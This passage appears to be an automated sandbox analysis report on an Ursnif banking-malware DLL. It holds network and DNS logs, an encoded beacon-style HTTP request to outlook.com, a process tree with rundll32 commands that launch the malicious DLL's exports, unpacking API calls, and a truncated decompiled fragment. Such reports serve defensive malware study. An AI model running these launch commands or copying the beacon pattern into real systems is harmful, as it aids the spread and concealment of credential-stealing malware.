Jul 7, 2021 10:42:57.579444885 CEST	49732	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.624507904 CEST	443	49731	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.624553919 CEST	443	49732	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.624711037 CEST	49731	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.625358105 CEST	49732	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.626530886 CEST	49731	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.626655102 CEST	49732	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.672415018 CEST	443	49732	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.672446012 CEST	443	49732	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.672461033 CEST	443	49732	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.672542095 CEST	443	49731	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.672554016 CEST	443	49731	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.672565937 CEST	443	49731	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.680099964 CEST	49732	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.680151939 CEST	49731	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.695789099 CEST	49732	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.696211100 CEST	49731	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.696568966 CEST	49732	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.741426945 CEST	443	49732	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.741890907 CEST	443	49732	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.742218018 CEST	49732	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.742263079 CEST	443	49731	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.742338896 CEST	49731	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:57.750545025 CEST	443	49732	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.750580072 CEST	443	49732	52.97.144.2	192.168.2.5
Jul 7, 2021 10:42:57.750969887 CEST	49732	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:58.934267044 CEST	49727	443	192.168.2.5	40.97.116.82
Jul 7, 2021 10:42:58.934361935 CEST	49729	443	192.168.2.5	52.97.152.210
Jul 7, 2021 10:42:58.934520960 CEST	49732	443	192.168.2.5	52.97.144.2
Jul 7, 2021 10:42:58.934555054 CEST	49731	443	192.168.2.5	52.97.144.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 7, 2021 10:41:06.493637085 CEST	64344	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:06.543250084 CEST	53	64344	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:07.554013014 CEST	62060	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:07.600009918 CEST	53	62060	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:07.859673023 CEST	61805	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:07.922938108 CEST	53	61805	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:08.033090115 CEST	54795	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:08.084286928 CEST	53	54795	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:08.444116116 CEST	49557	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:08.490957022 CEST	53	49557	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:10.187633991 CEST	61733	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:10.235408068 CEST	53	61733	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:11.916913033 CEST	65447	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:11.969238043 CEST	53	65447	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:13.034820080 CEST	52441	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:13.083679914 CEST	53	52441	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:14.300179005 CEST	62176	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:14.347477913 CEST	53	62176	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:50.303306103 CEST	59736	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:50.305263042 CEST	51058	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:50.305418968 CEST	52636	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:50.350764036 CEST	53	59736	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:50.353497028 CEST	53	52636	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:50.354608059 CEST	53	51058	8.8.8.8	192.168.2.5
Jul 7, 2021 10:41:50.467432022 CEST	59596	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:41:50.518011093 CEST	53	59596	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:22.293884039 CEST	65296	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:22.340636969 CEST	53	65296	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:23.517817974 CEST	63183	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:23.566267014 CEST	53	63183	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:24.820453882 CEST	60151	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:24.867818117 CEST	53	60151	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:25.943399906 CEST	56969	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:25.991075039 CEST	53	56969	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:32.901308060 CEST	55161	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:32.978351116 CEST	53	55161	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:48.833185911 CEST	54757	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:48.882189989 CEST	53	54757	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:51.021521091 CEST	49992	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:51.070379019 CEST	53	49992	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:53.333837032 CEST	60075	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:53.382605076 CEST	53	60075	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:54.000277042 CEST	55016	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:54.047828913 CEST	53	55016	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:56.563894987 CEST	64345	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:56.612906933 CEST	53	64345	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:57.276827097 CEST	57128	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:57.325242996 CEST	53	57128	8.8.8.8	192.168.2.5
Jul 7, 2021 10:42:57.526649952 CEST	54791	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:42:57.574337959 CEST	53	54791	8.8.8.8	192.168.2.5
Jul 7, 2021 10:43:05.758491039 CEST	50463	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:43:05.814879894 CEST	53	50463	8.8.8.8	192.168.2.5
Jul 7, 2021 10:43:14.342447042 CEST	50394	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:43:14.395380974 CEST	53	50394	8.8.8.8	192.168.2.5
Jul 7, 2021 10:43:18.729798079 CEST	58530	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:43:18.776760101 CEST	53	58530	8.8.8.8	192.168.2.5
Jul 7, 2021 10:43:19.727202892 CEST	58530	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:43:19.774288893 CEST	53	58530	8.8.8.8	192.168.2.5
Jul 7, 2021 10:43:20.740657091 CEST	58530	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:43:20.787770033 CEST	53	58530	8.8.8.8	192.168.2.5
Jul 7, 2021 10:43:22.740407944 CEST	58530	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:43:22.787152052 CEST	53	58530	8.8.8.8	192.168.2.5
Jul 7, 2021 10:43:26.756454945 CEST	58530	53	192.168.2.5	8.8.8.8
Jul 7, 2021 10:43:26.803472996 CEST	53	58530	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 7, 2021 10:42:51.021521091 CEST	192.168.2.5	8.8.8.8	0xed2a	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:53.333837032 CEST	192.168.2.5	8.8.8.8	0x696b	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:54.000277042 CEST	192.168.2.5	8.8.8.8	0xf187	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:56.563894987 CEST	192.168.2.5	8.8.8.8	0x2e0a	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:57.276827097 CEST	192.168.2.5	8.8.8.8	0x6302	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:57.526649952 CEST	192.168.2.5	8.8.8.8	0x49fa	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 7, 2021 10:42:51.070379019 CEST	8.8.8.8	192.168.2.5	0xed2a	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:51.070379019 CEST	8.8.8.8	192.168.2.5	0xed2a	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:51.070379019 CEST	8.8.8.8	192.168.2.5	0xed2a	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:51.070379019 CEST	8.8.8.8	192.168.2.5	0xed2a	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:51.070379019 CEST	8.8.8.8	192.168.2.5	0xed2a	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:51.070379019 CEST	8.8.8.8	192.168.2.5	0xed2a	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:51.070379019 CEST	8.8.8.8	192.168.2.5	0xed2a	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:51.070379019 CEST	8.8.8.8	192.168.2.5	0xed2a	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:53.382605076 CEST	8.8.8.8	192.168.2.5	0x696b	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:53.382605076 CEST	8.8.8.8	192.168.2.5	0x696b	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:53.382605076 CEST	8.8.8.8	192.168.2.5	0x696b	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:53.382605076 CEST	8.8.8.8	192.168.2.5	0x696b	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:53.382605076 CEST	8.8.8.8	192.168.2.5	0x696b	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.98	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:53.382605076 CEST	8.8.8.8	192.168.2.5	0x696b	No error (0)	HHN-efz.ms-acdc.office.com		52.98.175.18	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:53.382605076 CEST	8.8.8.8	192.168.2.5	0x696b	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.34	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:53.382605076 CEST	8.8.8.8	192.168.2.5	0x696b	No error (0)	HHN-efz.ms-acdc.office.com		52.97.150.2	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:54.047828913 CEST	8.8.8.8	192.168.2.5	0xf187	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:54.047828913 CEST	8.8.8.8	192.168.2.5	0xf187	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:54.047828913 CEST	8.8.8.8	192.168.2.5	0xf187	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:54.047828913 CEST	8.8.8.8	192.168.2.5	0xf187	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.2	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:54.047828913 CEST	8.8.8.8	192.168.2.5	0xf187	No error (0)	HHN-efz.ms-acdc.office.com		52.98.171.242	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:54.047828913 CEST	8.8.8.8	192.168.2.5	0xf187	No error (0)	HHN-efz.ms-acdc.office.com		52.98.151.226	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:54.047828913 CEST	8.8.8.8	192.168.2.5	0xf187	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.162	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:56.612906933 CEST	8.8.8.8	192.168.2.5	0x2e0a	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:56.612906933 CEST	8.8.8.8	192.168.2.5	0x2e0a	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:56.612906933 CEST	8.8.8.8	192.168.2.5	0x2e0a	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:56.612906933 CEST	8.8.8.8	192.168.2.5	0x2e0a	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:56.612906933 CEST	8.8.8.8	192.168.2.5	0x2e0a	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:56.612906933 CEST	8.8.8.8	192.168.2.5	0x2e0a	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:56.612906933 CEST	8.8.8.8	192.168.2.5	0x2e0a	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:56.612906933 CEST	8.8.8.8	192.168.2.5	0x2e0a	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:57.325242996 CEST	8.8.8.8	192.168.2.5	0x6302	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:57.325242996 CEST	8.8.8.8	192.168.2.5	0x6302	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:57.325242996 CEST	8.8.8.8	192.168.2.5	0x6302	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:57.325242996 CEST	8.8.8.8	192.168.2.5	0x6302	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:57.325242996 CEST	8.8.8.8	192.168.2.5	0x6302	No error (0)	FRA-efz.ms-acdc.office.com		52.97.152.210	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:57.325242996 CEST	8.8.8.8	192.168.2.5	0x6302	No error (0)	FRA-efz.ms-acdc.office.com		40.101.19.146	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:57.325242996 CEST	8.8.8.8	192.168.2.5	0x6302	No error (0)	FRA-efz.ms-acdc.office.com		40.101.83.194	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:57.574337959 CEST	8.8.8.8	192.168.2.5	0x49fa	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:57.574337959 CEST	8.8.8.8	192.168.2.5	0x49fa	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:57.574337959 CEST	8.8.8.8	192.168.2.5	0x49fa	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 7, 2021 10:42:57.574337959 CEST	8.8.8.8	192.168.2.5	0x49fa	No error (0)	FRA-efz.ms-acdc.office.com		52.97.144.2	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:57.574337959 CEST	8.8.8.8	192.168.2.5	0x49fa	No error (0)	FRA-efz.ms-acdc.office.com		52.97.163.2	A (IP address)	IN (0x0001)
Jul 7, 2021 10:42:57.574337959 CEST	8.8.8.8	192.168.2.5	0x49fa	No error (0)	FRA-efz.ms-acdc.office.com		52.97.188.66	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

outlook.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49721	40.97.116.82	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 7, 2021 10:42:51.274972916 CEST	1487	OUT	GET /grower/b1FUosZSinX/D_2FTo28i4eES3/o1nX6HvoNr7JCqEB2TBDy/3reac2cOKkFxPa3C/uHqcEARrcPcZDk3/M6E_2BTZS_2BVaLqj4/34AYxwikF/REm_2FMb1QNTSjBFb_2F/tvRFv4olV4RM6PFjWcs/Yxi4zCvrQiijB3JFDfkmao/_2Ff4LrwOirbu/dGY1O2o_/2BPYCJyNgelsd4Jc6x2/N.grow HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: outlook.com Connection: Keep-Alive
Jul 7, 2021 10:42:51.455990076 CEST	1488	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.com/grower/b1FUosZSinX/D_2FTo28i4eES3/o1nX6HvoNr7JCqEB2TBDy/3reac2cOKkFxPa3C/uHqcEARrcPcZDk3/M6E_2BTZS_2BVaLqj4/34AYxwikF/REm_2FMb1QNTSjBFb_2F/tvRFv4olV4RM6PFjWcs/Yxi4zCvrQiijB3JFDfkmao/_2Ff4LrwOirbu/dGY1O2o_/2BPYCJyNgelsd4Jc6x2/N.grow Server: Microsoft-IIS/10.0 request-id: 52e0a7cb-8602-91df-81c1-2dcb70efe4dd X-FEServer: MWHPR13CA0006 X-RequestId: 2526dedc-1dff-46a1-8916-d76af6eb2525 X-Powered-By: ASP.NET X-FEServer: MWHPR13CA0006 Date: Wed, 07 Jul 2021 08:42:51 GMT Connection: close Content-Length: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 2248 Parent PID: 5648

General

Start time:	10:41:12
Start date:	07/07/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\5.dll'
Imagebase:	0x1170000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5484 Parent PID: 2248

General

Start time:	10:41:12
Start date:	07/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\5.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1716 Parent PID: 2248

General

Start time:	10:41:13
Start date:	07/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\5.dll,Clockcondition
Imagebase:	0x960000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 452 Parent PID: 5484

General

Start time:	10:41:13
Start date:	07/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\5.dll',#1
Imagebase:	0x960000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2940 Parent PID: 2248

General

Start time:	10:41:17
Start date:	07/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\5.dll,Dogwhen
Imagebase:	0x960000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3904 Parent PID: 2248

General

Start time:	10:41:23
Start date:	07/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\5.dll,Sing
Imagebase:	0x960000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5580 Parent PID: 2248

General

Start time:	10:41:28
Start date:	07/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\5.dll,Wholegray
Imagebase:	0x960000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1900 Parent PID: 792

General

Start time:	10:42:47
Start date:	07/07/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff762e70000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3220 Parent PID: 1900

General

Start time:	10:42:48
Start date:	07/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17410 /prefetch:2
Imagebase:	0xf40000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5264 Parent PID: 1900

General

Start time:	10:42:53
Start date:	07/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17418 /prefetch:2
Imagebase:	0xf40000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 2248 Parent PID: 5648 loaddll32.exeCOMMON

Executed Functions

Function 6DE1E2D8, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000008D2,00003000,00000040,000008D2,6DE1DD28), ref: 6DE1E395
VirtualAlloc.KERNEL32(00000000,000000BC,00003000,00000040,6DE1DD8A), ref: 6DE1E3CC
VirtualAlloc.KERNEL32(00000000,00014035,00003000,00000040), ref: 6DE1E42C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE1E462
VirtualProtect.KERNEL32(6DDC0000,00000000,00000004,6DE1E2B7), ref: 6DE1E567
VirtualProtect.KERNEL32(6DDC0000,00001000,00000004,6DE1E2B7), ref: 6DE1E58E
VirtualProtect.KERNEL32(00000000,?,00000002,6DE1E2B7), ref: 6DE1E65B
VirtualProtect.KERNEL32(00000000,?,00000002,6DE1E2B7,?), ref: 6DE1E6B1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE1E6CD

Memory Dump Source

Source File: 00000000.00000002.498763329.000000006DE1B000.00000040.00020000.sdmp, Offset: 6DE1B000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: ea7051bcf577662ea71b9f4d64ee5b37725c0e97cf97417fba22f765f46f3abc
Instruction ID: fcbceebaa2aaf4acc111f1c1385a3c4a4b8b7c3c818fe12f534c6510fa93657b
Opcode Fuzzy Hash: ea7051bcf577662ea71b9f4d64ee5b37725c0e97cf97417fba22f765f46f3abc
Instruction Fuzzy Hash: 41D15F722097019FDB21AF14CC88A71F7A5FF88710B1D4198ED299F75AD7B0A811EB74

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1ADA, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6DDC1ADA(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
